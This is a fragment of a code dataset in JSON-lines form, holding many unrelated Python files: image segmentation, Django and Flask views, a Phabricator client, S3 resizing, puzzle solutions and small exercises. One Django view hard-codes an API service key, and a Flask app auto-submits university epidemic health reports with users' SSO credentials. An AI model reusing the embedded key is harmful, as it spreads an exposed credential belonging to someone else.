instance_custom_training()\ntrain_maskrcnn.modelConfig(network_backbone = \"resnet101\", num_classes= 1, batch_size = 4)\ntrain_maskrcnn.load_pretrained_model(\"/Users/sebastianperezlopez/Desktop/PixelLabTesting/COCO Model.nosync/mask_rcnn_coco.h5\")\ntrain_maskrcnn.load_dataset(\"/Users/sebastianperezlopez/Desktop/PixelLabTesting/SeepageDatasetNEW.nosync\")\ntrain_maskrcnn.train_model(num_epochs = 4, augmentation=False, path_trained_models = \"/Users/sebastianperezlopez/Desktop/PixelLabTesting/mask_rcnn_models.nosync\")\n\n\n# ## Create segmentation mask on new image using trained model \n# Photo output showing predicted mask over original photo\n# \n# *Set extract_segmented_objects=True if you want a .jpg file with only the segmented part of your original showing. Will appear in the directory of your .ipynb file. \n\n# In[21]:\n\n\n# Save extracted object (what mask predicts) as a separate file\nimport pixellib\nfrom pixellib.instance import custom_segmentation\n\nsegment_image = custom_segmentation()\nsegment_image.inferConfig(num_classes= 1, class_names= [\"BG\", \"seepage\"])\nsegment_image.load_model('/Users/sebastianperezlopez/Desktop/PixelLabTesting/mask_rcnn_models.nosync/Epoch2_16July') # Put filename of .h5 that has weights you just trained\nsegment_image.segmentImage(\"/Users/sebastianperezlopez/Desktop/framefolder.nosync/raw frames/_frame16500.jpg\", show_bboxes=False, output_image_name=\"/Users/sebastianperezlopez/Desktop/framefolder.nosync/mask+image/_frame16500.jpg\", extract_segmented_objects=False, save_extracted_objects=True)\n\n\n\n# In[14]:\n\n\n# importing pyplot and image from matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.image as img\n \n# reading png image file\nim = img.imread('/Users/sebastianperezlopez/Desktop/5 epochs/seepageTEST5.jpg')\n \n# show image\nplt.imshow(im)\n\n\n# ## Create segmentation mask on single image using trained model for further image manipulation (no output)\n# No photo output here; instead, saving segmented mask in segmask variable\n\n# In[28]:\n\n\nimport pixellib\nfrom pixellib.instance import custom_segmentation\nimport matplotlib.pyplot as plt\nimport matplotlib.image as img\n\noriginalImage = '/Users/sebastianperezlopez/Desktop/framefolder.nosync/raw frames/_frame16500.jpg'\n\nsegment_image = custom_segmentation()\nsegment_image.inferConfig(num_classes= 1, class_names= [\"BG\", \"seepage\"])\nsegment_image.load_model('/Users/sebastianperezlopez/Desktop/PixelLabTesting/mask_rcnn_models.nosync/Epoch2_16July') # Put filename of .h5 that has weights you just trained\nsegmask, output = segment_image.segmentImage(originalImage, show_bboxes=True, extract_segmented_objects= True)\n\n\n\n# ## Isolate Mask\n\n# In[29]:\n\n\n#https://www.codespeedy.com/change-the-pixel-values-of-an-image-in-python/\n\nfrom PIL import Image\nfrom IPython.display import display\nimport matplotlib.pyplot as plt\nimport matplotlib.image as img\nimport numpy\nfrom numpy import array\n\noutputMask = segmask['masks']\n\nimage = img.imread(originalImage)\n\nnewImage = Image.new('RGB', (image.shape[1],image.shape[0]), \"black\")\npixels = newImage.load()\n\nfor i in range(newImage.size[0]):\n for j in range(newImage.size[1]):\n if outputMask[j,i] == array([True]):\n pixels[i,j] = (255,255,255)\n if outputMask[j,i] == array([False]): \n pixels[i,j] = (0,0,0)\n \ndisplay(newImage)\n\nnewImage.save('/Users/sebastianperezlopez/Desktop/framefolder.nosync/segmented mask/_frame16500.jpg')\n\n#image.shape\n#outputMask.shape\n\n#for i in 
range(newImage.shape[0]):\n # for j in range(newImage.shape[1]):\n # if outputMask[i, j] == False:\n # newImage[i, j] = 0\n # else:\n # newImage[i, j] = 1\n\n\n# ## Isolate Masks' Upper Border\n\n# In[30]:\n\n\nfrom PIL import Image\nfrom IPython.display import display\nimport matplotlib.pyplot as plt\nimport matplotlib.image as img\nimport numpy\nfrom numpy import array\n\noutputMask = segmask['masks']\n\nimage = img.imread(originalImage)\n\nnewImage = Image.new('RGB', (image.shape[1],image.shape[0]), \"black\")\npixels = newImage.load()\n\n# outputMask = mask\n# newImage = size of original image, all black. \n\n\nfor i in range(newImage.size[0]):\n j = 0\n while outputMask[j,i] == array([False]):\n j += 1\n #if j == 4677: \n if j == image.shape[0]: \n break\n if outputMask[j,i] == array([True]):\n pixels[i,j] = (255,255,255)\n pixels[i+1,j] = (255,255,255)\n pixels[i+2,j] = (255,255,255)\n pixels[i+3,j] = (255,255,255)\n pixels[i-1,j] = (255,255,255)\n pixels[i-2,j] = (255,255,255)\n pixels[i-3,j] = (255,255,255)\n break\n \n\ndisplay(newImage)\n\n\nnewImage.save('/Users/sebastianperezlopez/Desktop/framefolder.nosync/segmented border/_frame16500.jpg')\n\n\n# ## Analyze a video file and separate frames / run image segmentation on each frame.\n\n# In[ ]:\n\n\n# crop video to only tank (I found this was easiest to do on an iPhone...)\n# need cv2 (OpenCV)\n\n\n# In[18]:\n\n\nimport cv2\n\nvideo = cv2.VideoCapture(\"/Users/sebastianperezlopez/Desktop/framefolder.nosync/DSC_7166.mp4\")\ntotal_frames = video.get(cv2.CAP_PROP_FRAME_COUNT)\nprint(total_frames)\n\nfor i in range(0, 17784, 500):\n video.set(1, i)\n ret, still = video.read()\n cv2.imwrite(f'/Users/sebastianperezlopez/Desktop/framefolder.nosync/raw frames/_frame{i}.jpg', still)\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"MaskRCNN.py","file_name":"MaskRCNN.py","file_ext":"py","file_size_in_byte":6391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"389027471","text":"#!/usr/bin/python3\nclass Square():\n \"\"\"A class used to represent a square.\n\n Attributes:\n __size: A private int with size of Square.\n \"\"\"\n def __init__(self, size=0):\n \"\"\"Inits Square with size, only allowed type int >= 0.\"\"\"\n try:\n if not type(size) == int:\n raise TypeError\n except TypeError as e:\n raise Exception(\"size must be an integer\") from e\n try:\n if (int(size) < 0):\n raise ValueError\n self.__size = size\n except ValueError as e:\n raise Exception(\"size must be >= 0\") from e\n","sub_path":"0x06-python-classes/2-square.py","file_name":"2-square.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"577773022","text":"#-*- coding: utf-8 -*-\r\nimport pprint, json, requests\r\n \r\nimport xml.etree.ElementTree\r\nfrom bs4 import BeautifulSoup\r\nfrom django.shortcuts import render\r\nfrom django.http import JsonResponse\r\n# Create your views here.\r\n\r\nserviceKey = \"sYYsbAStv5lTMH32zXdixfecuB3dMciY5lyOva1NYa0rQD2odfRg82LZn%2F3QBqa%2BerqaXm28HDph%2FcPI%2BQe7Tw%3D%3D\"\r\n# serviceKey = URLEncoder.encode(serviceKey, \"UTF-8\")\r\n\r\ndef health(request):\r\n pprint.pprint(request.body)\r\n if request.method == 'POST':\r\n # nugu_body = json.loads(request.body, encoding='utf-8')\r\n aItem = request.POST.get(\"a\")\r\n bItem = request.POST.get(\"b\")\r\n url = 
f\"http://apis.data.go.kr/1470000/DURPrdlstInfoService/getUsjntTabooInfoList?ServiceKey={serviceKey}&itemName={aItem}\"\n print(url)\n responses = requests.get(url)\n response = BeautifulSoup(responses.content, 'lxml-xml')\n pprint.pprint(response)\n \n # pprint.pprint(nugu_body)\n \n else:\n return render(request, 'pills/interaction.html')\n \ndef oldmanCare(request):\n global serviceKey # 서비스 인증키 불러오기 (전역변수)\n \n # 요청변수(Request Parameter)\n typeName = \"병용금기\" # DUR 유형\n ingrName = \"클로르디아제폭시드\" # DUR 성분\n \n # DUR 품목정보 API\n # 서비스요청 URL\n url = f'http://apis.data.go.kr/1470000/DURIrdntInfoService/getOdsnAtentInfoList?ServiceKey={serviceKey}&typeName={typeName}&ingrName={ingrName}&numOfRows=3&pageNo=1'\n responses = requests.get(url)\n response = BeautifulSoup(responses.content, 'lxml-xml')\n pprint.pprint(response)\n return render(request, 'pills/oldmanCare.html', {'response': response})\n ","sub_path":"pills/.~c9_invoke_tGgs7.py","file_name":".~c9_invoke_tGgs7.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"582453812","text":"\"\"\"Phabricator client classes.\"\"\"\n\nimport requests\n\n\nclass PhabricatorClient:\n \"\"\"Simple Phabricator client.\"\"\"\n\n PRIORITY_HIGH = 75\n\n STATUS_OPEN = 'open'\n\n def __init__(self, host, api_token):\n \"\"\"Create client for specified host and api token.\"\"\"\n self.host = host\n self.api_token = api_token\n\n def api_request(self, method, params):\n \"\"\"Make api request to Phabricator.\"\"\"\n params['api.token'] = self.api_token\n r = requests.get('https://{}/api/{}'.format(self.host, method),\n params=params)\n return r.json()['result']\n\n def get_task(self, task_id):\n \"\"\"Get task by id.\"\"\"\n result = self.api_request('maniphest.search', {\n 'constraints[ids][0]': task_id\n })['data']\n\n if len(result) > 0:\n result = result[0]\n else:\n return None\n\n return PhabricatorTask.fromApiResult(self, result)\n\n def get_user(self, user_phid):\n \"\"\"Get user by phid.\"\"\"\n result = self.api_request('user.search', {\n 'constraints[phids][0]': user_phid\n })['data'][0]\n\n user = PhabricatorUser(self)\n user.username = result['fields']['username']\n return user\n\n def find_tasks(self, priorities=[], statuses=[]):\n \"\"\"Find tasks.\"\"\"\n params = {}\n\n for i in range(0, len(priorities)):\n params['constraints[priorities][' + str(i) + ']'] = priorities\n for i in range(0, len(statuses)):\n params['constraints[statuses][' + str(i) + ']'] = statuses\n\n result = self.api_request('maniphest.search', params)['data']\n tasks = []\n for entry in result:\n tasks.append(PhabricatorTask.fromApiResult(self, entry))\n return tasks\n\n\nclass PhabricatorTask:\n \"\"\"Class representing Phabricator task.\"\"\"\n\n def __init__(self, client):\n \"\"\"Create instance for client.\"\"\"\n self.client = client\n\n @staticmethod\n def fromApiResult(client, entry):\n \"\"\"Create instance and fill it with data from api request result.\"\"\"\n task = PhabricatorTask(client)\n task.id = entry.get('id')\n fields = entry.get('fields', {})\n task.title = fields.get('name')\n task.ownerPHID = fields.get('ownerPHID')\n task.authorPHID = fields.get('authorPHID')\n task.priority = fields.get('priority', {}).get('name')\n task.status = fields.get('status', {}).get('name')\n task.dateModified = fields.get('dateModified')\n return task\n\n @property\n def author(self):\n \"\"\"Get task author.\"\"\"\n if self.authorPHID is None:\n return None\n\n if not 
hasattr(self, '_author'):\n self._author = self.client.get_user(self.authorPHID)\n return self._author\n\n @property\n def owner(self):\n \"\"\"Get task owner/assignee.\"\"\"\n if self.ownerPHID is None:\n return None\n\n if not hasattr(self, '_owner'):\n self._owner = self.client.get_user(self.ownerPHID)\n return self._owner\n\n @property\n def link(self):\n \"\"\"Get link to the task.\"\"\"\n return \"https://{}/T{}\".format(self.client.host, self.id)\n\n\nclass PhabricatorUser:\n \"\"\"Class representing Phabricator user.\"\"\"\n\n def __init__(self, client):\n \"\"\"Create instance for client.\"\"\"\n self.client = client\n","sub_path":"modules/utils/phabricator.py","file_name":"phabricator.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"167700519","text":"# Fibonacci series (30 terms)\ndef create_fibonacci_series(length):\n \"\"\"\n Takes the desired length\n :return: the resulting series\n \"\"\"\n list_fibonacci = [1, 1]\n while len(list_fibonacci) < length:\n number = list_fibonacci[- 1] + list_fibonacci[- 2]\n list_fibonacci.append(number)\n return list_fibonacci\n\n\nlist01 = create_fibonacci_series(10)\nprint(list01)\n\n\n# Print the primes below 100\ndef prime_number(start=2, end=100):\n return [number for number in range(start, end) if check_prime_number(number)]\n\n\ndef check_prime_number(number):\n for item in range(2, number):\n if number % item == 0:\n return False\n return True\n\n\nprint(prime_number())\n","sub_path":"python_study/base02/tarnar02.py","file_name":"tarnar02.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"541810800","text":"import os\nfrom PIL import Image\nimport boto3\nfrom boto3.s3.transfer import S3Transfer\nimport tempfile\ns3 = boto3.resource('s3')\nbucket = s3.Bucket('images-from')\nclient = boto3.client('s3','ap-northeast-1')\ntransfer = S3Transfer(client)\ndir_imagesfrom = tempfile.TemporaryDirectory()\ndir_imagesto = tempfile.TemporaryDirectory()\nfor obj in bucket.objects.all():\n transfer.download_file('images-from',obj.key,dir_imagesfrom.name +'\\\\'+ obj.key)\nfor filename in os.listdir(dir_imagesfrom.name):\n img = Image.open(dir_imagesfrom.name+'\\\\'+filename)\n w, h = img.size\n img.thumbnail((w//2,h//2))\n img.save(dir_imagesto.name+'\\\\'+filename)\nfor filename in os.listdir(dir_imagesto.name):\n transfer.upload_file(dir_imagesto.name +'\\\\'+ filename,'images-to',filename)\n print('uploaded:',filename)\ndir_imagesfrom.cleanup()\ndir_imagesto.cleanup()\n\n\n\n","sub_path":"image_resize/resize_use_tempfile.py","file_name":"resize_use_tempfile.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"486935260","text":"from sinric import SinricPro, SinricProConstants\nimport asyncio\n\nAPP_KEY = ''\nAPP_SECRET = ''\nSWITCH_ID = ''\n\n\ndef power_state(device_id, state):\n print('device_id: {} state: {}'.format(device_id, state))\n return True, state\n\n\ncallbacks = {\n SinricProConstants.SET_POWER_STATE: power_state\n}\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n client = SinricPro(APP_KEY, [SWITCH_ID], callbacks,\n enable_log=False, restore_states=False, secret_key=APP_SECRET)\n loop.run_until_complete(client.connect())\n\n# To update the power state on server.\n# client.event_handler.raise_event(SWITCH_ID, SinricProConstants.SET_POWER_STATE, data = {SinricProConstants.STATE: 
SinricProConstants.POWER_STATE_ON })\n# client.event_handler.raise_event(SWITCH_ID, SinricProConstants.SET_POWER_STATE, data = {SinricProConstants.STATE: SinricProConstants.POWER_STATE_OFF })\n","sub_path":"examples/switch.py","file_name":"switch.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"654026093","text":"from django.conf.urls import url\n\n\nfrom . import views\n\nurlpatterns = [\n url(r'^layouts/$', views.layouts, name='layouts'), \n url(r'^look/(?P[0-9]+)/$', views.look, name='look'), \n url(r'^rack_item/(?P[0-9]+)/$', views.rack_item, name='rack_item'), \n url(r'^look_item/(?P[0-9]+)/$', views.look_item, name='look_item'), \n url(r'^look_list/$', views.look_list, name='look_list'), \n url(r'^user_product_favorites/(?P[0-9]+)/$', views.user_product_favorites, name='user_product_favorites'), \n url(r'^user_product_favorite/(?P[0-9]+)/$', views.user_product_favorite, name='user_product_favorite'),\n url(r'^user_look_favorites/(?P[0-9]+)/$', views.user_look_favorites, name='user_look_favorites'), \n url(r'^user_look_favorite/(?P[0-9]+)/$', views.user_look_favorite, name='user_look_favorite'),\n url(r'^client_360/(?P[0-9]+)/$', views.client_360, name='client_360'),\n url(r'^styling_session_note/(?P[0-9]+)/$', views.styling_session_note, name='styling_session_note'),\n url(r'^styling_session_notes/(?P[0-9]+)/$', views.styling_session_notes, name='styling_session_notes'),\n url(r'^look_meta_tags/(?P[0-9]+)/$', views.look_meta_tags, name='look_meta_tags'),\n url(r'^style_occasions/$', views.style_occasions, name='style_occasions'), \n url(r'^style_type/$', views.style_type, name='style_type'), \n url(r'^update_look_position/(?P[0-9]+)/$', views.update_look_position, name='update_look_position'),\n url(r'^update_look_collage_image_data/(?P[0-9]+)/$', views.update_look_collage_image_data, name='update_look_collage_image_data'),\n url(r'^update_cropped_image_code/(?P[0-9]+)/$', views.update_cropped_image_code, name='update_cropped_image_code'),\n url(r'^get_allume_size/$', views.get_allume_size, name='get_allume_size'),\n url(r'^add_client_to_360/(?P[0-9]+)/$', views.add_client_to_360_api, name='add_client_to_360_api'),\n url(r'^add_look_to_session/(?P[0-9]+)/(?P[0-9]+)/$', views.add_look_to_session, name='add_look_to_session'),\n # sold out reporting\n url(r'^report_product_inventory_mismatch_from_anna/$', views.report_product_inventory_mismatch_from_anna, name='report_product_inventory_mismatch_from_anna'),\n url(r'^report_product_inventory_mismatch/$', views.report_product_inventory_mismatch, name='report_product_inventory_mismatch'),\n # download the look_copy report\n url(r'^look_copy_report/$', views.look_copy_report, name='look_copy_report'),\n\n]\n","sub_path":"shopping_tool_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"41345400","text":"import itertools\n\nmaze = {}\nstart = None\nlocations = []\n\nx, y = 0, 0\nfor line in open('input.txt'):\n\tfor x in range(len(line.rstrip())):\n\t\tmaze[x, y] = line[x]\n\t\tif line[x] == '0':\n\t\t\tstart = (x, y)\n\t\telif line[x] not in '#.':\n\t\t\tlocations.append((x, y))\n\n\ty += 1\n\n# BFS for shortest path\ndef getShortestPath(start, end):\n\tstates = {}\n\tsteps = 0\n\tpos = start\n\tqueue = [(pos, steps)]\n\n\twhile pos != end:\n\t\tpos, steps = queue.pop(0)\n\n\t\tif pos in 
states:\n\t\t\tcontinue\n\n\t\tstates[pos] = steps\n\n\t\tx, y = pos\n\n\t\tfor move in [(x + 1, y), (x - 1, y), (x, y + 1), (x, y - 1)]:\n\t\t\tif maze[move] != '#':\n\t\t\t\tqueue.append((move, steps + 1))\n\n\treturn steps\n\ndistances = {}\n\nfor location in locations:\n\tdistances[start, location] = getShortestPath(start, location)\n\tdistances[location, start] = distances[start, location]\n\nfor pointA, pointB in itertools.combinations(locations, 2):\n\tlength = getShortestPath(pointA, pointB)\n\n\t# store the distance in both directions for easier lookups\n\tdistances[pointA, pointB], distances[pointB, pointA] = length, length\n\nleastSteps = float('inf')\nfor path in itertools.permutations(locations, len(locations)):\n\tpath = (start,) + path + (start,)\n\tsteps = 0\n\n\tfor i in range(len(path) - 1):\n\t\tsteps += distances[path[i], path[i + 1]]\n\n\tleastSteps = min(leastSteps, steps)\n\nprint(leastSteps)\n","sub_path":"2016/day24/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"522824726","text":"n = int(input(\"Введите количество билетов:\\n\"))\nfound = 0\nfor numcount in range (n):\n tick = str(input(\"Введите номер билета/билетов:\\n\"))\n if (tick[0] == 'a') and (tick[4] == '5') and (tick[5] == '5') and (tick[6] == '6') and (tick[7] == '6') and (tick[8] == '1'):\n print(tick, end = ' ')\n break\n else:\n found += 1\nif found == n:\n print(\"-1\", end = ' ')","sub_path":"practice/16/python/16.py","file_name":"16.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"93479505","text":"#coding=utf-8\nfun={\n \"一\":1,\n \"二\":2,\n \"三\":3,\n \"四\":4,\n \"五\":5,\n \"六\":6,\n \"七\":7,\n \"八\":8,\n \"九\":9,\n \"十\":10,\n \"十一\":11,\n \"十二\":12,\n \"十三\":13,\n \"十四\":14,\n \"十五\":15,\n \"十六\":16,\n \"十七\":17,\n \"十八\":18,\n \"十九\":19,\n \"二十\":20,\n \"二十一\":21,\n \"二十二\":22,\n \"二十三\":23,\n \"二十四\":24,\n \"二十五\":25,\n \"二十六\":26,\n \"二十七\":27,\n \"二十八\":28,\n \"二十九\":29,\n \"三十\":30,\n \"三十一\":31,\n \"三十二\":32,\n \"三十三\":33\n}\n\nimport xlrd\n#打开一个workbook\nworkbook = xlrd.open_workbook('./test.xlsx')\n#抓取所有sheet页的名称\nworksheets = workbook.sheet_names()\n#print('worksheets is %s' %worksheets)\n#定位到sheet1\nworksheet1 = workbook.sheet_by_name(u'Sheet1')\n\"\"\"\n#通过索引顺序获取\nworksheet1 = workbook.sheets()[0]\n#或\nworksheet1 = workbook.sheet_by_index(0)\n\"\"\"\n\nimport xlwt\nworkbook2 = xlwt.Workbook() #注意Workbook的开头W要大写\nsheet1 = workbook2.add_sheet('sheet1',cell_overwrite_ok=True)\n\nnum_rows = worksheet1.nrows\nfor curr_row in range(num_rows):\n row = worksheet1.row_values(curr_row)\n for index in range(len(row)):\n if(curr_row!=0 and index==1):\n sheet1.write(curr_row,index,fun[row[index]])\n else:\n sheet1.write(curr_row,index,row[index])\n\n #print(row[0],fun[row[1]],row[2])\n\nworkbook2.save('./2.xls')","sub_path":"Python/excel/xls_xlrd_xlwt.py","file_name":"xls_xlrd_xlwt.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"128325138","text":"import json\nimport requests\nimport datetime\nfrom flask import *\nfrom flask_cors import CORS\nfrom reporter.make_result import make_result\nfrom reporter.config import config\nfrom reporter.utils import logger, handle_request_exceptions\nfrom tasks import epidemic_report\n\napp_name = 'epidemic'\napp = 
Flask(app_name)\nCORS(app, supports_credentials=True)\nhandle_request_exceptions(app)\n\n\ndef get_apis() -> dict:\n return {\n '/': {\n \"description\": 'Index and description of the Epidemic Report API',\n 'methods': ['GET'],\n 'args': {},\n 'rets': {\n 'apis': \"Lists of API urls and args\"\n }\n },\n '/report': {\n \"description\": 'HITsz疫情上报',\n 'methods': ['GET', 'POST'],\n 'args': {\n \"username\": {\n \"description\": 'HITsz SSO登录用户名(学号)',\n \"required\": True\n },\n \"password\": {\n \"description\": \"HITsz SSO登录密码\",\n \"required\": True\n },\n \"api_key\": {\n \"description\": \"Server酱的SCKEY\",\n \"required\": False\n }\n }\n }\n }\n\n\n@app.route('/', methods=['GET'])\ndef index():\n return make_result(data={\n 'description': f'HITsz-daily-reporter API v{config.data.get(\"epidemic-report-version\", None)}',\n 'apis': get_apis()\n })\n\n\n@app.route('/report/', methods=['GET', 'POST'])\ndef report():\n if request.method == 'GET':\n args = request.args\n elif request.method == 'POST':\n try:\n args = request.json\n except json.decoder.JSONDecodeError:\n return make_result(400)\n else:\n return make_result(400)\n args = json.loads(json.dumps(args))\n required = ['username', 'password']\n for r in required:\n if r not in args:\n return make_result(400, message=f'Arg {r} is required')\n is_successful, msg = epidemic_report.main(args)\n if is_successful:\n txt = f\"疫情上报成功!{datetime.datetime.today().strftime('%Y-%m-%d %H:%M:%S')}\"\n else:\n txt = f\"疫情上报失败,原因:{msg}{datetime.datetime.today().strftime('%Y-%m-%d %H:%M:%S')}\"\n if 'api_key' in args and not is_successful:\n requests.get(f\"https://sc.ftqq.com/{args['api_key']}.send?text={txt}\")\n return make_result(code=200 if is_successful else 403, message=txt)\n","sub_path":"api/tasks/app_epidemic_report.py","file_name":"app_epidemic_report.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"360808909","text":"# !usr/bin/python\n# -*- coding:utf-8 -*-\n\nimport requests\nimport time\nfrom lxml import etree\n\ndef get_url_json(url, headers = None):\n res = False\n while res == False:\n time.sleep(0.3)\n try:\n response = requests.get(url, headers=headers)\n res = True\n return response.json()\n except:\n print('get_url_json err,err url =', url)\n res = False\n \n\ndef get_url_html(url):\n res = False\n while res == False:\n time.sleep(0.3)\n try:\n response = requests.get(url)\n if response.status_code == 500:\n return ''\n html = etree.HTML(response.text)\n res = True\n return html\n except:\n print('get_url_html err,err url =', url)\n res = False","sub_path":"common_fun.py","file_name":"common_fun.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"385285742","text":"from node import Node, BeaconBlock, MainChainBlock, ShardCollation\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport random, time\n\n\n## This method creates an offset for plotting blocks of the main chain,\n# the beacon chain and all the shards\n# @param b Block to be plotted\ndef mkoffset(b):\n return random.randrange(5) + \\\n (0 if isinstance(b, MainChainBlock) else\n 5 if isinstance(b, BeaconBlock) else\n 5 + 5 * b.shard_id if isinstance(b, ShardCollation) else\n None)\n\n\n## This method plots the blockchain as seen from one of the notaries\n# @param n The notary to plot its view of the chain\ndef plotChain(n):\n 
G=nx.Graph()\n fileName = \"results/chain-\" + str(n.id) + \".png\"\n for b in n.blocks.values():\n if b.number > 0:\n if isinstance(b, BeaconBlock):\n G.add_edge(b.hash, b.main_chain_ref, color='c')\n G.add_edge(b.hash, b.parent_hash, color='g')\n elif isinstance(b, MainChainBlock):\n G.add_edge(b.hash, b.parent_hash, color='b')\n elif isinstance(b, ShardCollation):\n G.add_edge(b.hash, b.beacon_ref, color='r')\n G.add_edge(b.hash, b.parent_hash, color='y')\n plt.clf()\n fig = plt.figure(figsize=(18,9))\n pos={b.hash: (b.ts + mkoffset(b), b.ts) for b in n.blocks.values()}\n edges = G.edges()\n colors = [G[u][v]['color'] for u,v in edges]\n nx.draw_networkx_nodes(G, pos, node_size=10, node_shape='o', node_color='0.75')\n nx.draw_networkx_edges(G, pos, width=2, edge_color=colors)\n plt.ylabel(\"Time (ticks)\")\n plt.savefig(fileName, bbox_inches=\"tight\")\n plt.close()\n\n\n## This method plots the peer to peer network of the blockchain being\n# simulated\n# @param peers The peer to peer network to plot\n# @param dir The directory where the figure should be saved\ndef plotNetwork(peers, dir):\n plt.clf()\n G=nx.Graph()\n fig = plt.figure(figsize=(18,9))\n for peer in peers:\n G.add_node(str(peer))\n for p in peers.get(peer):\n G.add_edge(str(peer), str(p.id))\n nx.draw(G, with_labels=True)\n plt.axis(\"off\")\n plt.savefig(dir+\"/network.png\", bbox_inches=\"tight\")\n\n\n","sub_path":"lshards/src/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"616531572","text":"# section04-1\n# requests scrapping - Session\n\nimport requests\n\n# Activate Session\ns = requests.session()\n\nr = s.get('https://www.google.com')\n\n# response data\nprint(r.text)\n\n# Status 200,201,404.......\nprint('Status Code : {}'.format(r.status_code))\n\n# check True, False\nprint('OK? : {}'.format(r.ok))\n\ns = requests.session()\n\n# cookie Return\n\nr1 = s.get(\"https://httpbin.org/cookies\", cookies={'name' : 'seo1'})\nprint(r1.text)\n\n# cookie Set\nr2 = s.get(\"https://httpbin.org/cookies/set\", cookies={'name' : 'seo2'})\nprint(r2.text)\n\n\n# User-agent\nurl = \"https://httpbin.org\"\nheaders = {'user-agent' : 'niceman_1.0.0_win10_ram16_home_chrome'}\n\n# header request\nr3 = s.get(url, headers=headers, cookies={'name' : 'seo1'})\n# print(r3.text)\n\n# Deactivate Session\ns.close()\n\n# with -> File, DB, HTTP\nwith requests.session() as s:\n r = s.get('https://www.google.com')\n # print(r.text)\n print(r.ok)\n\n\n\n","sub_path":"section04-1.py","file_name":"section04-1.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"507616798","text":"# Create a class the displays the Elevator art and navigation (list of commands)\n\nclass View():\n building_levels = 12\n building_width = 35\n\n def intro(self, position, people):\n print(\"\\n----- THE MIGHTY ELEVATOR -----\\n\")\n print(\"People in the elevator: {} (max. 
5)\\nElevator position: {}\\n\".format(people, position))\n print(self.draw_top())\n print(self.draw_levels(position, people))\n print(self.draw_bottom())\n print(self.nav())\n print(\"\\nWhat would you like to do?\")\n\n def draw_top(self):\n top1 = \"\"\n for i in range(self.building_width):\n top1 += \"_\"\n top2 = \"'\"\n for j in range(1, self.building_width-1):\n top2 += \" \"\n top2 += \"'\"\n top3 = \" '\"\n for i in range(2, self.building_width-2):\n top3 += \"_\"\n top3 += \"'\"\n return top1 + \"\\n\" + top2 + \"\\n\" + top3\n\n def draw_levels(self, position, people):\n levels = \"\"\n for i in range(self.building_levels, 0, -1):\n if i == 1 and position != 1:\n levels += \" \"*2 + \"_\" + \"||_\"*2 + \"_\"*6 + \"||_\"*2 + \"_\"*6 + \"||_\"*2\n elif i == position and position != 1:\n levels += self.draw_elevator(position, people)\n elif i == position and position == 1:\n levels += self.draw_elevator(position, people)\n else:\n levels += \" \"*3 + \"|| \"*2 + \" \"*6 + \"|| \"*2 + \" \"*6 + \"|| \"*2 + \"\\n\"\n return levels\n\n def draw_bottom(self):\n line2 = \"'\"\n for j in range(1, self.building_width-1):\n line2 += \" \"\n line2 += \"'\"\n line3 = \"|\"\n for i in range(1, self.building_width-1):\n line3 += \"_\"\n line3 += \"|\"\n return line2 + \"\\n\" + line3\n\n def draw_elevator(self, position, people):\n elevator = \"\"\n if position != 1 and people == 0:\n elevator += \" \"*3 + \"|| \"*2 + \"[ ] \" + \"|| \"*2 + \" \"*6 + \"|| \"*2 + \"\\n\"\n elif position == 1 and people == 0:\n elevator += \" \"*2 + \"_\" + \"||_\"*2 + \"[___]_\" + \"||_\"*2 + \"_\"*6 + \"||_\"*2\n elif position != 1 and people > 0:\n elevator += \" \"*3 + \"|| \"*2 + \"[ X ] \" + \"|| \"*2 + \" \"*6 + \"|| \"*2 + \"\\n\"\n elif position == 1 and people > 0:\n elevator += \" \"*2 + \"_\" + \"||_\"*2 + \"[_X_]_\" + \"||_\"*2 + \"_\"*6 + \"||_\"*2\n return elevator\n\n def nav(self):\n return(\"\\n---- CONTROLS ----\\n\\nto X - enter a number to move to floor\\nin X - enter a number to add people to the elevator\\nout X - enter a number to remove people from the elevator\\nexit - exit the application\")\n\n def invalid_command(self):\n print(\"Please enter a valid command.\")\n print(\"\\nPress a button to refresh!\")\n user_error = input()\n\n#newele = View()\n#print(newele.draw_top())\n#print(newele.draw_levels(1, 